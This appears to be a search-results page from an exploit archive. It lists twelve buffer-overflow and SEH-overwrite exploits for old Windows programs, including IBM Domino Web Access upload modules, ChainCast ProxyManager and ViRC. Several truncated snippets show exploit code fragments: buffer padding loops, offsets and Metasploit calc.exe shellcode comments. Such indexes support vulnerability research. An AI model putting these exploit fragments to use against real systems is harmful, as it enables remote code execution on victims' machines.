12 matches found
Virtuosa Phoenix Edition 5.2 ASX SEH BOF
Exploit for windows platform in category local exploits !/usr/bin/python Exploit Title: Virtuosa Phoenix Edition 5.2 ASX BOF SEH Overwrite Date found: Aug 16th 2010 Author: Acidgen Software Link: http://download1.virtuosa.com/VirtuosaTrial.exe Version: 5.2 Tested on: Windows XP SP2 Virtuosa - Fil...
RainbowPlayer .rpl文件解析栈溢出漏洞
BUGTRAQ ID: 34072 RainbowPlayer是一个Windows版的免费媒体播放器。 如果用户受骗使用RainbowPlayer打开了包含有超长项的播放列表文件(.rpl),就可能触发栈溢出,导致执行任意指令。 NanoCode Software RainbowPlayer 0.91 厂商补丁: NanoCode Software ----------------- 目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本: http://www.nanocodesoft.com/rainbowplayer.htm usage:...
StreamAudio ChainCast ProxyManager - 'ccpm_0237.dll' Remote Buffer Overflow
StreamAudio ChainCast ProxyManager ccpm0237.dll SEH Overwrite Exploit function Check var buf = 'A'; while buf.length = 242 buf = buf + 'A'; // win32exec - EXITFUNC=seh CMD=c:\windows\system32\calc.exe Size=378 Encoder=Alpha2 http://metasploit.com var shellcode1 =...
StreamAudio ChainCast ProxyManager - ccpm_0237.dll Remote Buffer Overflow
StreamAudio ChainCast ProxyManager - ccpm0237.dll Remote Buffer Overflow StreamAudio ChainCast ProxyManager ccpm0237.dll SEH Overwrite Exploit function Check var buf = 'A'; while buf.length = 242 buf = buf + 'A'; // win32exec - EXITFUNC=seh CMD=c:\windows\system32\calc.exe Size=378 Encoder=Alpha2...
Move Networks Quantum Streaming Player SEH Overwrite Exploit
Exploit for unknown platform in category remote exploits ============================================================ Move Networks Quantum Streaming Player SEH Overwrite Exploit ============================================================ Move Networks Quantum Streaming Player SEH Overwrite...
IBM Domino Web Access Upload Module inotes6.dll BoF Exploit
No description provided by source. !-- written by e.b. IBM Domino Web Access Upload Module inotes6.dll SEH Overwrite Exploit Bad chars: 0x80+ CVE-2007-4474 Tested on Windows XP SP2fully patched English, IE6, inotes6.dll version 6.0.40.0 and version 6.0.48.0...
inotes6w2-overwrite.txt
This one is the same offset as dwa7w and the same class id as inotes6. Basically inotes6 and inotes6w share the same class id, except that inotes6w is unicode. dwa7w is unicode and has a different class id. Code is inline, I would attach it except for the fact that I set off way to many av scanne...
dwa7w-overwrite.txt
This one is unicode based, so is inotes6w. Exploitation for inotes6w is probably the same just with a different offset. Code is inline and attached. --------------------- IBM Domino Web Access Upload Module dwa7w.dll SEH Overwrite Exploit function Check var buf = unescape"%u4141"; while buf.lengt...
IBM Domino Web Access Upload Module - dwa7w.dll Remote Buffer Overflow
IBM Domino Web Access Upload Module - dwa7w.dll Remote Buffer Overflow IBM Domino Web Access Upload Module dwa7w.dll SEH Overwrite Exploit function Check var buf = unescape"%u4141"; while buf.length = 2461 buf = buf + unescape"%u4141"; // win32exec - EXITFUNC=seh CMD=c:\windows\system32\calc.exe...
IBM Domino Web Access 7.0 Upload Module - inotes6.dll Remote Buffer Overflow
IBM Domino Web Access 7.0 Upload Module - inotes6.dll Remote Buffer Overflow IBM Domino Web Access Upload Module inotes6.dll SEH Overwrite Exploit function Check var buf = 'A'; while buf.length = 3119 buf = buf + 'A'; // win32exec - EXITFUNC=seh CMD=c:\windows\system32\calc.exe Size=378...
ViRC 2.0 (JOIN Response) Remote SEH Overwrite Exploit 0day
No description provided by source. !/usr/bin/python ViRC 2.0 'JOIN Response' 0day Remote SEH Overwrite PoC Exploit Bug discovered by Krystian Kloskowski h07 [email protected] Tested on Visual IRC 2.0 / 2k SP4 Polish Shellcode type: Windows Execute Command calc.exe How stuff works ? .. ViRC -----...
SAP DB 7.x Web Server - WAHTTP.exe Multiple Buffer Overflow Vulnerabilities
SAP DB 7.x Web Server - WAHTTP.exe Multiple Buffer Overflow Vulnerabilities // source: https://www.securityfocus.com/bid/24773/info SAP DB Web Server is prone to multiple buffer-overflow vulnerabilities because it fails to adequately bounds-check user-supplied input before copying it to an...